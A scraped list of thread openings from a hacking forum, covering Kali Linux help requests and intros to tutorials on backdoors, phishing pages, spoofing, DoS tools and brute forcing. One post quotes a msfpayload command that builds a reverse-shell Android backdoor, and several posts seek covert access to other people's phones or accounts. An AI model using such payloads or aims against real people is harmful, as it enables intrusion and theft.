After playing around with the Linux Distribution"Kali Linux" for a while, I learned about the payload called "meterpreter," which basically allows you to connect to someones computer remotely if the backdoor is installed on a victims PC. To create the backdoor, I used a program called "Veil Evasion." After learning how to use Veil-Evasion, I quickly compiled a backdoor. Photo of Veil below. Anyways... I compiled the backdoor to an EXE and moved it to my Windows 7 desktop (I am using a Virtual...
Hello There, i recently had some questions about hacking
Hi Guys I have Kali (using VMware to run it on my windows 7 laptop)
Sup, my fellow white hat hackers! In this tutorial, I will show you an AWESOME script for key logging.
Hi there! I'm Joash Jeshurun & this is my first writing on this website. Today, in this post I'll reveal how hackers try to gain access into Android devices and cause disastrous effects.
SORRY, THIS WEB-PAGE IS NOW (Almost) CLOSED...!!!
Hello, I've recently downloaded Kali to try to learn some new cool stuff. I came across the TheFatRat program on the net and I've downloaded it and generated a backdoor apk(tried both msfvenom and original apk-s)
I'm trying to create a windows executable meterpreter payload using msfvenom to execute on my own computer running Windows 7 64-bit. I've tried using the following commands to produce the executable:
Hi...I am a newbie. Last night i was playing with wifite. And tergated my own network for attack along with another network. And as expected wifi dis connected. Then i exit and shut down my laptop.
Hello There, i recently had some questions about hacking
so I wanna hack a wps locked wifi, is their any program like bully/reaver that can do it?? keep getting AP warning with those.
Hello everyone! I thought I'd help a few people out by writing a written tutorial on how to install Kali Linux on your chromebook, as well as Metasploit-Framework, so let's begin! If you would like a video version instead, watch my YouTube video at the bottom of the page. Although this guide is a lot more clear.
I Had a Program Installed on My Computer to Block the Internet, Now I Am Trying to Uninstall It but It Asks for a Password to Uninstall.
I installed kali Linux on my desktop selecting gdm3 and it worked perfect after the installation. However after I have updated and upgraded, I restarted my pc and it gets stuck with a queue of lines ending with "started gnome display manager". After I press Alt + F2 I can login using my details. I tried hitting sudo service gdm3 start. It did work once but now it's not anymore. I tried installing over and over again. Everytime I am stuck here. Please kindly help me out.
Hello, fellow hackers! Today I am going to show you just how easy it is to spoof E-Mails and impersonate any E-Mail address. Because of how easy it is to do, anyone with five minutes of free time can send malicious E-Mails to you while pretending to be your boss, teacher, SO, etc. You can probably guess how devastating the consequences of such an attack can be.
I'll start with a disclaimer: this phone is, following the laws in my country, legally in my possession. I'll share some anonymous background information, but that is not the subject of this post. The phone came into my possession after my brother abruptly passed away (him being the previous rightful owner and not having a partner or children). Because of how he passed away I am not capable of gaining access to the phone; however, also because of how he passed away, me and the family really w...
Hello techies? I'm using Debian, Kali to be exact. Whenever I try sudo su, it executes the /usr/bin/zsh and I don't know how I set this or how to bring it back to normal. Someone to hel
Hello techies? I'm using Debian, Kali to be exact. Whenever I try sudo su, it executes the /usr/bin/zsh and I don't know how I set this or how to bring it back to normal. Someone to help
I know quiet well linux and decide to start with kali linux few weeks ago. So i installed it on my usb key and boot in persistence mode with it. Everything worked as i was expecting, wifi connection... But i wanted to try aircrack-ng so i began with scaning networks but it doesn't seems to work :
Unicorn Framework is an iOS, macOS and Linux post-exploitation framework that using one line command and powerful python payload attempts to spawn a command line session with a lot of features such as downloading files, uploading files, getting system information and etc.
I'm trying to use Alfa awus1900 for WiFi hacking bit it doesn't does the job and after turning on monitor mode the still shows as wlan0 in both the modes in monitorias well as manager mode so do some kindly help me with the homework
When i use an exploit, i receive an error... Here is printscreen with the error: http://postimg.org/image/fd7zq8ubl/
I know SET used to have sms spoofing but it has since been removed. How would I do it now?
Forum Thread: How Does Someone Attack Account by Just Having Their @Username ? The Application Is Kik!
some dude was asking for my kik username! and someone provide it to him and now i can't even connect or see the messages! is it ddos attack?
I currently have Kali 1.1.0a and I really want to use the sms spoofer on SET but its only available on the old versions of SET. So how could I replace my version of SET with the version of SET that has the sms spoofer? Thanks!
So I know that i can use proxy chain the host side of the reverse_tcp connection but the victim pc connects to my public ip so someone can easily check who is doing the attack. Can I somehow add proxychain to the msfvenom payload
Hi, Metasploit was updated recently (or, at least, since the last time I used it), and one large thing, is msfpayload was removed, and replaced with msfvenom. I used to be able to just do msfpayload android/meterpreter/reverse_tcp LHOST=ip R > /root/name.apk
Hello there, Recently I have come across many guides about creating phishing pages. Although the principles behind each guide is similar, most of the hosting solutions provided in the guide does not work anymore due to an increase in the crackdown of phishing pages by the hosting companies. In this guide, I will go through every step necessary to create and host a phishing page of your choice. Enjoy!
I've been trying to hack my own pcs and android.. I was able to hack my pc using online videos and converting exe to jpg. But i can't apply that method for android. I hacked my own phone through a payload apk, but i need the payload in an image. Can anyone help me out?
Hello everyone! I need some help regarding stdapifsstat: Operation failed: 1 this issue. I have created an infected apk file using Evil-Droid and have successfully created a session over LAN with my android device. Every command is working perfectly. But I want to download pictures from DCIM folder to my root directory.
Hello guys, My adapter name in linux ipconfig command shows wlan0.
i have a android phone and im wondering if i could get remote access to it with just the ip of the device and being able to look to whatsapp etc . i would like to preform actions like in a metasploit session but just without an file that needs to be installed on the device
we have all heard about the hulk tool for dosing sites but time has passed and it went hold, now it barely can hold any sites off with CDNs and Loadbalancing servers like nginx and cloudflare protecting them. well not any more, witness the power of the new and improved hulk tool version 1.0.2, available in both golang and python.
Hey everybody. So this week I've been making it my mission to learn a bit about THC Hydra and all the little bells and whistles it has to offer — trust me, there are A LOT.
Hi, I am a Kali Linux user, and I used metasploit to get access of the webcam.
In my school labs, every computer has DeepFreeze installed, which makes downloading useful programs a lot harder, because you need to install it on every boot.
Whenever i try to set a multi handler this error occurs. It Used to work for me but not working anymore
Hello all I'm using Ubuntu
NEW VERSION : https://Null-byte.wonderhowto.com/Forum/Hacking-Facebook-Twitter-Instagram-Account-Passwords-with-Bruteforce-0181808/